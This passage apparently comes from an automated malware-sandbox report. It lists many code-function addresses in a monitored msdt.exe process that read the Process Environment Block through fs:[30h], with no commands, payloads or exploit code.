Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956C0A mov eax, dword ptr fs:[00000030h]	6_2_04956C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956C0A mov eax, dword ptr fs:[00000030h]	6_2_04956C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956C0A mov eax, dword ptr fs:[00000030h]	6_2_04956C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956C0A mov eax, dword ptr fs:[00000030h]	6_2_04956C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490BC2C mov eax, dword ptr fs:[00000030h]	6_2_0490BC2C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496C450 mov eax, dword ptr fs:[00000030h]	6_2_0496C450
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496C450 mov eax, dword ptr fs:[00000030h]	6_2_0496C450
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490A44B mov eax, dword ptr fs:[00000030h]	6_2_0490A44B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F746D mov eax, dword ptr fs:[00000030h]	6_2_048F746D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D2D8A mov eax, dword ptr fs:[00000030h]	6_2_048D2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D2D8A mov eax, dword ptr fs:[00000030h]	6_2_048D2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D2D8A mov eax, dword ptr fs:[00000030h]	6_2_048D2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D2D8A mov eax, dword ptr fs:[00000030h]	6_2_048D2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D2D8A mov eax, dword ptr fs:[00000030h]	6_2_048D2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490FD9B mov eax, dword ptr fs:[00000030h]	6_2_0490FD9B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490FD9B mov eax, dword ptr fs:[00000030h]	6_2_0490FD9B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902581 mov eax, dword ptr fs:[00000030h]	6_2_04902581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902581 mov eax, dword ptr fs:[00000030h]	6_2_04902581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902581 mov eax, dword ptr fs:[00000030h]	6_2_04902581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902581 mov eax, dword ptr fs:[00000030h]	6_2_04902581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04901DB5 mov eax, dword ptr fs:[00000030h]	6_2_04901DB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04901DB5 mov eax, dword ptr fs:[00000030h]	6_2_04901DB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04901DB5 mov eax, dword ptr fs:[00000030h]	6_2_04901DB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049035A1 mov eax, dword ptr fs:[00000030h]	6_2_049035A1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A05AC mov eax, dword ptr fs:[00000030h]	6_2_049A05AC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A05AC mov eax, dword ptr fs:[00000030h]	6_2_049A05AC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956DC9 mov eax, dword ptr fs:[00000030h]	6_2_04956DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956DC9 mov eax, dword ptr fs:[00000030h]	6_2_04956DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956DC9 mov eax, dword ptr fs:[00000030h]	6_2_04956DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956DC9 mov ecx, dword ptr fs:[00000030h]	6_2_04956DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956DC9 mov eax, dword ptr fs:[00000030h]	6_2_04956DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956DC9 mov eax, dword ptr fs:[00000030h]	6_2_04956DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04988DF1 mov eax, dword ptr fs:[00000030h]	6_2_04988DF1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048ED5E0 mov eax, dword ptr fs:[00000030h]	6_2_048ED5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048ED5E0 mov eax, dword ptr fs:[00000030h]	6_2_048ED5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0499FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0499FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0499FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0499FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499E539 mov eax, dword ptr fs:[00000030h]	6_2_0499E539
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0495A537 mov eax, dword ptr fs:[00000030h]	6_2_0495A537
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04904D3B mov eax, dword ptr fs:[00000030h]	6_2_04904D3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04904D3B mov eax, dword ptr fs:[00000030h]	6_2_04904D3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04904D3B mov eax, dword ptr fs:[00000030h]	6_2_04904D3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A8D34 mov eax, dword ptr fs:[00000030h]	6_2_049A8D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E3D34 mov eax, dword ptr fs:[00000030h]	6_2_048E3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DAD30 mov eax, dword ptr fs:[00000030h]	6_2_048DAD30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04913D43 mov eax, dword ptr fs:[00000030h]	6_2_04913D43
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04953540 mov eax, dword ptr fs:[00000030h]	6_2_04953540
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04983D40 mov eax, dword ptr fs:[00000030h]	6_2_04983D40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F7D50 mov eax, dword ptr fs:[00000030h]	6_2_048F7D50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FC577 mov eax, dword ptr fs:[00000030h]	6_2_048FC577
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FC577 mov eax, dword ptr fs:[00000030h]	6_2_048FC577
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496FE87 mov eax, dword ptr fs:[00000030h]	6_2_0496FE87
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049546A7 mov eax, dword ptr fs:[00000030h]	6_2_049546A7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A0EA5 mov eax, dword ptr fs:[00000030h]	6_2_049A0EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A0EA5 mov eax, dword ptr fs:[00000030h]	6_2_049A0EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A0EA5 mov eax, dword ptr fs:[00000030h]	6_2_049A0EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A8ED6 mov eax, dword ptr fs:[00000030h]	6_2_049A8ED6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04918EC7 mov eax, dword ptr fs:[00000030h]	6_2_04918EC7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0498FEC0 mov eax, dword ptr fs:[00000030h]	6_2_0498FEC0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049036CC mov eax, dword ptr fs:[00000030h]	6_2_049036CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E76E2 mov eax, dword ptr fs:[00000030h]	6_2_048E76E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049016E0 mov ecx, dword ptr fs:[00000030h]	6_2_049016E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490A61C mov eax, dword ptr fs:[00000030h]	6_2_0490A61C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490A61C mov eax, dword ptr fs:[00000030h]	6_2_0490A61C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DC600 mov eax, dword ptr fs:[00000030h]	6_2_048DC600
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DC600 mov eax, dword ptr fs:[00000030h]	6_2_048DC600
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DC600 mov eax, dword ptr fs:[00000030h]	6_2_048DC600
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04908E00 mov eax, dword ptr fs:[00000030h]	6_2_04908E00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991608 mov eax, dword ptr fs:[00000030h]	6_2_04991608
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0498FE3F mov eax, dword ptr fs:[00000030h]	6_2_0498FE3F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DE620 mov eax, dword ptr fs:[00000030h]	6_2_048DE620
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E7E41 mov eax, dword ptr fs:[00000030h]	6_2_048E7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E7E41 mov eax, dword ptr fs:[00000030h]	6_2_048E7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E7E41 mov eax, dword ptr fs:[00000030h]	6_2_048E7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E7E41 mov eax, dword ptr fs:[00000030h]	6_2_048E7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E7E41 mov eax, dword ptr fs:[00000030h]	6_2_048E7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E7E41 mov eax, dword ptr fs:[00000030h]	6_2_048E7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499AE44 mov eax, dword ptr fs:[00000030h]	6_2_0499AE44
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499AE44 mov eax, dword ptr fs:[00000030h]	6_2_0499AE44
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E766D mov eax, dword ptr fs:[00000030h]	6_2_048E766D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FAE73 mov eax, dword ptr fs:[00000030h]	6_2_048FAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FAE73 mov eax, dword ptr fs:[00000030h]	6_2_048FAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FAE73 mov eax, dword ptr fs:[00000030h]	6_2_048FAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FAE73 mov eax, dword ptr fs:[00000030h]	6_2_048FAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FAE73 mov eax, dword ptr fs:[00000030h]	6_2_048FAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04957794 mov eax, dword ptr fs:[00000030h]	6_2_04957794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04957794 mov eax, dword ptr fs:[00000030h]	6_2_04957794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04957794 mov eax, dword ptr fs:[00000030h]	6_2_04957794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E8794 mov eax, dword ptr fs:[00000030h]	6_2_048E8794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049137F5 mov eax, dword ptr fs:[00000030h]	6_2_049137F5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496FF10 mov eax, dword ptr fs:[00000030h]	6_2_0496FF10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496FF10 mov eax, dword ptr fs:[00000030h]	6_2_0496FF10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A070D mov eax, dword ptr fs:[00000030h]	6_2_049A070D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A070D mov eax, dword ptr fs:[00000030h]	6_2_049A070D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FF716 mov eax, dword ptr fs:[00000030h]	6_2_048FF716
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490A70E mov eax, dword ptr fs:[00000030h]	6_2_0490A70E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490A70E mov eax, dword ptr fs:[00000030h]	6_2_0490A70E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490E730 mov eax, dword ptr fs:[00000030h]	6_2_0490E730
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D4F2E mov eax, dword ptr fs:[00000030h]	6_2_048D4F2E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D4F2E mov eax, dword ptr fs:[00000030h]	6_2_048D4F2E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EEF40 mov eax, dword ptr fs:[00000030h]	6_2_048EEF40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EFF60 mov eax, dword ptr fs:[00000030h]	6_2_048EFF60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A8F6A mov eax, dword ptr fs:[00000030h]	6_2_049A8F6A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D9080 mov eax, dword ptr fs:[00000030h]	6_2_048D9080
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04953884 mov eax, dword ptr fs:[00000030h]	6_2_04953884
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04953884 mov eax, dword ptr fs:[00000030h]	6_2_04953884
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490F0BF mov ecx, dword ptr fs:[00000030h]	6_2_0490F0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490F0BF mov eax, dword ptr fs:[00000030h]	6_2_0490F0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490F0BF mov eax, dword ptr fs:[00000030h]	6_2_0490F0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049020A0 mov eax, dword ptr fs:[00000030h]	6_2_049020A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049020A0 mov eax, dword ptr fs:[00000030h]	6_2_049020A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049020A0 mov eax, dword ptr fs:[00000030h]	6_2_049020A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049020A0 mov eax, dword ptr fs:[00000030h]	6_2_049020A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049020A0 mov eax, dword ptr fs:[00000030h]	6_2_049020A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049020A0 mov eax, dword ptr fs:[00000030h]	6_2_049020A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049190AF mov eax, dword ptr fs:[00000030h]	6_2_049190AF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0496B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496B8D0 mov ecx, dword ptr fs:[00000030h]	6_2_0496B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0496B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0496B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0496B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0496B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0496B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D58EC mov eax, dword ptr fs:[00000030h]	6_2_048D58EC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D40E1 mov eax, dword ptr fs:[00000030h]	6_2_048D40E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D40E1 mov eax, dword ptr fs:[00000030h]	6_2_048D40E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D40E1 mov eax, dword ptr fs:[00000030h]	6_2_048D40E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04957016 mov eax, dword ptr fs:[00000030h]	6_2_04957016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04957016 mov eax, dword ptr fs:[00000030h]	6_2_04957016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04957016 mov eax, dword ptr fs:[00000030h]	6_2_04957016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A4015 mov eax, dword ptr fs:[00000030h]	6_2_049A4015
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A4015 mov eax, dword ptr fs:[00000030h]	6_2_049A4015
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EB02A mov eax, dword ptr fs:[00000030h]	6_2_048EB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EB02A mov eax, dword ptr fs:[00000030h]	6_2_048EB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EB02A mov eax, dword ptr fs:[00000030h]	6_2_048EB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EB02A mov eax, dword ptr fs:[00000030h]	6_2_048EB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490002D mov eax, dword ptr fs:[00000030h]	6_2_0490002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490002D mov eax, dword ptr fs:[00000030h]	6_2_0490002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490002D mov eax, dword ptr fs:[00000030h]	6_2_0490002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490002D mov eax, dword ptr fs:[00000030h]	6_2_0490002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490002D mov eax, dword ptr fs:[00000030h]	6_2_0490002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F0050 mov eax, dword ptr fs:[00000030h]	6_2_048F0050
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F0050 mov eax, dword ptr fs:[00000030h]	6_2_048F0050
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04992073 mov eax, dword ptr fs:[00000030h]	6_2_04992073
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A1074 mov eax, dword ptr fs:[00000030h]	6_2_049A1074
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902990 mov eax, dword ptr fs:[00000030h]	6_2_04902990
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FC182 mov eax, dword ptr fs:[00000030h]	6_2_048FC182
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490A185 mov eax, dword ptr fs:[00000030h]	6_2_0490A185
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049551BE mov eax, dword ptr fs:[00000030h]	6_2_049551BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049551BE mov eax, dword ptr fs:[00000030h]	6_2_049551BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049551BE mov eax, dword ptr fs:[00000030h]	6_2_049551BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049551BE mov eax, dword ptr fs:[00000030h]	6_2_049551BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049061A0 mov eax, dword ptr fs:[00000030h]	6_2_049061A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049061A0 mov eax, dword ptr fs:[00000030h]	6_2_049061A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049569A6 mov eax, dword ptr fs:[00000030h]	6_2_049569A6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049949A4 mov eax, dword ptr fs:[00000030h]	6_2_049949A4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049949A4 mov eax, dword ptr fs:[00000030h]	6_2_049949A4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049949A4 mov eax, dword ptr fs:[00000030h]	6_2_049949A4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049949A4 mov eax, dword ptr fs:[00000030h]	6_2_049949A4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DB1E1 mov eax, dword ptr fs:[00000030h]	6_2_048DB1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DB1E1 mov eax, dword ptr fs:[00000030h]	6_2_048DB1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DB1E1 mov eax, dword ptr fs:[00000030h]	6_2_048DB1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049641E8 mov eax, dword ptr fs:[00000030h]	6_2_049641E8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D9100 mov eax, dword ptr fs:[00000030h]	6_2_048D9100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D9100 mov eax, dword ptr fs:[00000030h]	6_2_048D9100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D9100 mov eax, dword ptr fs:[00000030h]	6_2_048D9100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490513A mov eax, dword ptr fs:[00000030h]	6_2_0490513A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490513A mov eax, dword ptr fs:[00000030h]	6_2_0490513A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F4120 mov eax, dword ptr fs:[00000030h]	6_2_048F4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F4120 mov eax, dword ptr fs:[00000030h]	6_2_048F4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F4120 mov eax, dword ptr fs:[00000030h]	6_2_048F4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F4120 mov eax, dword ptr fs:[00000030h]	6_2_048F4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F4120 mov ecx, dword ptr fs:[00000030h]	6_2_048F4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FB944 mov eax, dword ptr fs:[00000030h]	6_2_048FB944
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FB944 mov eax, dword ptr fs:[00000030h]	6_2_048FB944
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DC962 mov eax, dword ptr fs:[00000030h]	6_2_048DC962
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DB171 mov eax, dword ptr fs:[00000030h]	6_2_048DB171
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DB171 mov eax, dword ptr fs:[00000030h]	6_2_048DB171
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490D294 mov eax, dword ptr fs:[00000030h]	6_2_0490D294
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490D294 mov eax, dword ptr fs:[00000030h]	6_2_0490D294
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490FAB0 mov eax, dword ptr fs:[00000030h]	6_2_0490FAB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D52A5 mov eax, dword ptr fs:[00000030h]	6_2_048D52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D52A5 mov eax, dword ptr fs:[00000030h]	6_2_048D52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D52A5 mov eax, dword ptr fs:[00000030h]	6_2_048D52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D52A5 mov eax, dword ptr fs:[00000030h]	6_2_048D52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D52A5 mov eax, dword ptr fs:[00000030h]	6_2_048D52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EAAB0 mov eax, dword ptr fs:[00000030h]	6_2_048EAAB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EAAB0 mov eax, dword ptr fs:[00000030h]	6_2_048EAAB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902ACB mov eax, dword ptr fs:[00000030h]	6_2_04902ACB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902AE4 mov eax, dword ptr fs:[00000030h]	6_2_04902AE4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E8A0A mov eax, dword ptr fs:[00000030h]	6_2_048E8A0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499AA16 mov eax, dword ptr fs:[00000030h]	6_2_0499AA16
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499AA16 mov eax, dword ptr fs:[00000030h]	6_2_0499AA16
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F3A1C mov eax, dword ptr fs:[00000030h]	6_2_048F3A1C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DAA16 mov eax, dword ptr fs:[00000030h]	6_2_048DAA16
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DAA16 mov eax, dword ptr fs:[00000030h]	6_2_048DAA16
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D5210 mov eax, dword ptr fs:[00000030h]	6_2_048D5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D5210 mov ecx, dword ptr fs:[00000030h]	6_2_048D5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D5210 mov eax, dword ptr fs:[00000030h]	6_2_048D5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D5210 mov eax, dword ptr fs:[00000030h]	6_2_048D5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04914A2C mov eax, dword ptr fs:[00000030h]	6_2_04914A2C
